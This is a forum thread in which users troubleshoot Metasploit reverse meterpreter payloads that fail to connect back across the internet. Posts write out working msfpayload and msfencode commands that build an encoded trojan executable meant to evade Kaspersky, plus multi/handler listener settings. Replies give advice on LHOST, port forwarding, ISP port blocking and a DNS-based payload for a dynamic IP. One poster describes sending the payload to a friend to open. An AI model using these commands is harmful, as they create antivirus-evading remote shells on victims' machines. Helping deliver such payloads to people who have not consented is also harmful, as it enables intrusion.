MetaSploit - Some problems

[0megear]

Hello folks.

I'am try to create a test situation where i sploit someone via the internet. To do so, i have 2 computers (1 victim and 1 attacker) all based on two different connection and i generate a simple meterpreter.exe + handler on my backtrackbox and the windows victim will stupidly double click on my .exe

It's really just for trying purpose and it even doesn't work.

So this is what i do :


1. On my Backtrackbox ( 192.168.1.2 // 85.23.145.28 ) I generate the meterpreter and encode-it to bypass Kaspersky

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=85.23.145.28 LPORT=8080 R | ./msfencode -e php/base64 -c 6 -t raw | ./msfencode -e x86/shitaka_ga_nai -c 20 -t exe > /root/binaries/final.exe

2. Then still on my backtrackbox, I'am opening the handler to recept the reverse from the victim when he will doubleclick it

Code:

msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 85.23.145.28
msf> set LPORT 8080
msf> exploit

[-] Handler failed to bind to 85.23.145.28:8080 // I guess this isn't really an issue since it just "listen" to the victim connexion, so the local IP should be fine.. right ?
[*] Started reverse handler on 0.0.0.0:8080
[*] Starting the payload handler...

3.Everything seems ok to me so far. Now i'm going to get the .exe and run it to my box

And it's here that everything seems to fail. I don't know why. I tryied without antivirus, my NAT are correct, my port-forwarding is setup and ready to forward...

I just double click on the exe, a window pop 1 sec and then nothing. The handler doesn't move and the meterpreter doesn't seems to work.

The windows box (victim) is a Windows 7 machine.



Am i missing something ? I did something wrong ?




Sincerly,

0megear

[sickness]

Try setting your LHOST to your internal IP if you have done the port forwarding.

[0megear]

I don't know what i'am doing wrong but it is not working.

My victim computer is a Windows 7 (build 7600, unlicensed) without firewall and antivirus. The meterpreter is double clicked, a cmd.exe show.. and then nothing. No handler when i take a look on my backtrack computer. I tryied without encode and it still doesn't work.

What is strange about it, is that it seem to have random result. During my test, the meterpreter.exe on the victim was popping 1 sec then disappearing and when i generated the exact same meterpreter 15 min later, the cmd.exe was just here opnened without disappearing.

I must do something wrong but i double checked everything and i just don't get it.

[Nosuke]

Digging up old topics, I know, but I am posting this just in case someone have encounter the same error and needs help.

The LHOST should be your backtrack box IP, not the victim IP.
It should start with 172.x.x.x or 192.168.x.x.x

After you enter exploit, the victim have to click on the exe file you created to be exploited

85.23.145.28:8080

For your understanding, the LHOST (aka Listening Host) should be YOU, or a server you are connected to and is listening for ANY connection from the victim. RHOST (aka Remote Host) will be the victim IP. Therefore in any TROJAN you created, you should always set the LISTENING HOST to YOU, so that any victim clicks on the exe when you are listening victim would allow the trojan to work.

[iproute]

i would look for the stager(payload you generated) exe in windows task manager to see it if is running or just opens then closes. Or perhaps try using netstat in windows to observe outbound tcp/ip connections. To test if the port forwarding is setup correctly for handler, you can browse to 85.23.145.28:8080 from windows box and watch if handler responds in any way

[erick]

hi,
I have a problem with Metasploit outside lan ..

in practice:

1-forward the port 4444 of my router,

2-disable the firewall on my pc

3-create the payload windows / meterpreter / reverse_tcp LHOST with (my ip no-ip), LHPORT = 4444

4-open mfsconsole:
use exploit / multi / handler
September PAYLOAD windows / meterpreter / reverse_tcp
September LHOST (my internal ip)
LPORT September 4444
exploit

5-send the payload, my friend opens it and nothing happens ..

what's the problem? within the LAN works ..
hello

[iproute]

many ISPs block port 4444. We do(i work for one). Try it on another port

[comaX]

hi,
I have a problem with Metasploit outside lan ..

in practice:

1-forward the port 4444 of my router,

2-disable the firewall on my pc

3-create the payload windows / meterpreter / reverse_tcp LHOST with (my ip no-ip), LHPORT = 4444

4-open mfsconsole:
use exploit / multi / handler
September PAYLOAD windows / meterpreter / reverse_tcp
September LHOST (my internal ip)
LPORT September 4444
exploit

5-send the payload, my friend opens it and nothing happens ..

what's the problem? within the LAN works ..
hello

I might say something stupid but... "september" ? 0.o
And I assume you mistyped but in your post you wrote "LHPORT"

Also as iproute said, try changing your lport.

(@iproute : why blocking this port ?)

[iproute]

I might say something stupid but... "september" ? 0.o
And I assume you mistyped but in your post you wrote "LHPORT"

Also as iproute said, try changing your lport.

(@iproute : why blocking this port ?)

Not sure. Metasploit was the best answer I could come up with. In our list of blocked ports we have it labeled as microsoft dcom or rpc or some such.


@erick Oh and windows/meterpreter/reverse_tcp_dns is the more appropriate payload if using no-ip dyndns service